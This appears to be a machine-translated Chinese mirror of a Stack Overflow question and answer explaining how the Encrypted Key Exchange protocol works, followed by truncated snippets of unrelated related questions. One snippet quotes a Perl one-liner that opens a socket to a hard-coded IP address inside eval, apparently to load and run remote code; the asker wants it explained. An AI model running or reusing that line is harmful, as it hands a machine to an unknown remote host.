- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
我正在尝试了解加密 key 交换
机制。我对这个插图有点困惑:
并没有找到很多有用的引用资料。谁能解释一下 EKE 的机制及其工作原理吗?双方正在交换什么以及为什么攻击(例如中间人)是安全的?这将会非常有帮助。
谢谢。
最佳答案
在尝试寻找 EKE 或 DH-EKE 的实现时,我预计现有的引用资料数量相当有限。维基百科相互交叉链接,我遇到的解释不一定那么容易理解。 EKE的原始专利于2011年到期,导致我的理解EAP-EKE得以发布。
我在 Bruce Schneier 的《应用密码学》(第二版)中找到了最好的解释,包括对算法的改进。由于您已经了解了该过程,因此我将尝试以通俗易懂的方式回答其中发生的情况。我只是在学习自己,所以我可能会弄错你的图像,但它似乎是 DH-EKE 实现。我会坚持使用 EKE-idea 来回答这个问题,因为我认为我已经基本理解了;-)
基础是爱丽丝和鲍勃共享一个共同的 secret 。我可能会忽略一点它有多“弱”(在你的图像中它被标记为弱),但让我们假设它是一个有效的对称加密 key 。
双方都有相同的对称 key S,这是一个共享的 secret
Alice 生成 session Pa(私有(private))和 P'a(公共(public))唯一的公钥/私钥对,Alice 使用 S 加密公钥并将其发送给 Bob。
Bob(知道 S)解密 Alice 的消息并恢复 Alice 的公钥 P'a。 Bob 生成随机 session key K。Bob 使用 Alice 的公钥 P'a 加密 K 并将其发送给 Alice。
Alice解密消息得到K。Alice生成随机字符串Ra,用K加密并发送给bob
Bob 解密消息以获得 Ra,生成另一个随机 Rb,用 K 加密两者并将加密消息发送给 Alice。
Alice 解密消息,验证消息中她自己的 Ra 是否有效。她仅用 K 加密 Rb 并将其发送给 Bob。
Bob 解密 Rb 并验证他自己的 Rb 是否有效。
对于 Eve 来说,要实现中间人,她只看到 key 是用其他 key 加密的。如果不破解公钥算法,就不可能从 Alice 和 Bob 之间受监控的流量中猜测密码。然而,弱共享 secret 确实允许 Eve 尝试假装是图片中的 Alice 或 Bob,因此(我的术语可能有缺陷)可以发起针对监听服务器的主动攻击。
我描述的版本中有一些假设,最好由其他人(已发布)解释,Alice 被信任生成良好的 key 对,Bob 被信任生成良好的 session key 。另外,有些算法更适合(或者有些更糟糕)。 “应用密码学”中列出了一些内容,但由于我的第二版似乎有点落后于 AES 之类的内容,我相信会挖掘出更多关于好的密码的最新信息来选择算法。
就其值(value)而言,我似乎需要自己使用 C# 和 Java(Azure .NET 后端、Android 客户端)来实现 EKE。我尝试以对其他人有用的方式打包它。
更新:C# 上非常简单的实现可在以下位置找到: https://github.com/kallex/sharp-eke-example
它像现在一样快捷了一些位(只是明文的 SHA256 来使用初始 key ),所以要小心。我当前的使用方式是通过机器生成安全 key 并将其分发给单独 channel 中的双方,因此我不需要为此测试台进行任何更复杂的实现。
关于encryption - 加密 key 交换理解,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/15779392/
我试图理解 (>>=).(>>=) ,GHCi 告诉我的是: (>>=) :: Monad m => m a -> (a -> m b) -> m b (>>=).(>>=) :: Mon
关于此 Java 代码,我有以下问题: public static void main(String[] args) { int A = 12, B = 24; int x = A,
对于这个社区来说,这可能是一个愚蠢的基本问题,但如果有人能向我解释一下,我会非常满意,我对此感到非常困惑。我在网上找到了这个教程,这是一个例子。 function sports (x){
def counting_sort(array, maxval): """in-place counting sort""" m = maxval + 1 count = [0
我有一些排序算法的集合,我想弄清楚它究竟是如何运作的。 我对一些说明有些困惑,特别是 cmp 和 jle 说明,所以我正在寻求帮助。此程序集对包含三个元素的数组进行排序。 0.00 :
阅读 PHP.net 文档时,我偶然发现了一个扭曲了我理解 $this 的方式的问题: class C { public function speak_child() { //
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。 想改善这个问题吗?更新问题,使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
我有几个关于 pragmas 的相关问题.让我开始这一系列问题的原因是试图确定是否可以禁用某些警告而不用一直到 no worries。 (我还是想担心,至少有点担心!)。我仍然对那个特定问题的答案感兴
我正在尝试构建 CNN使用 Torch 7 .我对 Lua 很陌生.我试图关注这个 link .我遇到了一个叫做 setmetatable 的东西在以下代码块中: setmetatable(train
我有这段代码 use lib do{eval&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"}; 这似乎导入了一个库,但
我有以下代码,它给出了 [2,4,6] : j :: [Int] j = ((\f x -> map x) (\y -> y + 3) (\z -> 2*z)) [1,2,3] 为什么?似乎只使用了“
我刚刚使用 Richard Bird 的书学习 Haskell 和函数式编程,并遇到了 (.) 函数的类型签名。即 (.) :: (b -> c) -> (a -> b) -> (a -> c) 和相
我遇到了andThen ,但没有正确理解它。 为了进一步了解它,我阅读了 Function1.andThen文档 def andThen[A](g: (R) ⇒ A): (T1) ⇒ A mm是 Mu
这是一个代码,用作 XMLHttpRequest 的 URL 的附加内容。URL 中显示的内容是: http://something/something.aspx?QueryString_from_b
考虑以下我从 https://stackoverflow.com/a/28250704/460084 获取的代码 function getExample() { var a = promise
将 list1::: list2 运算符应用于两个列表是否相当于将 list1 的所有内容附加到 list2 ? scala> val a = List(1,2,3) a: List[Int] = L
在python中我会写: {a:0 for a in range(5)} 得到 {0: 0, 1: 0, 2: 0, 3: 0, 4: 0} 我怎样才能在 Dart 中达到同样的效果? 到目前为止,我
关闭。这个问题需要多问focused 。目前不接受答案。 想要改进此问题吗?更新问题,使其仅关注一个问题 editing this post . 已关闭 5 年前。 Improve this ques
我有以下 make 文件: CC = gcc CCDEPMODE = depmode=gcc3 CFLAGS = -g -O2 -W -Wall -Wno-unused -Wno-multichar
有人可以帮助或指导我如何理解以下实现中的 fmap 函数吗? data Rose a = a :> [Rose a] deriving (Eq, Show) instance Functor Rose
我是一名优秀的程序员,十分优秀!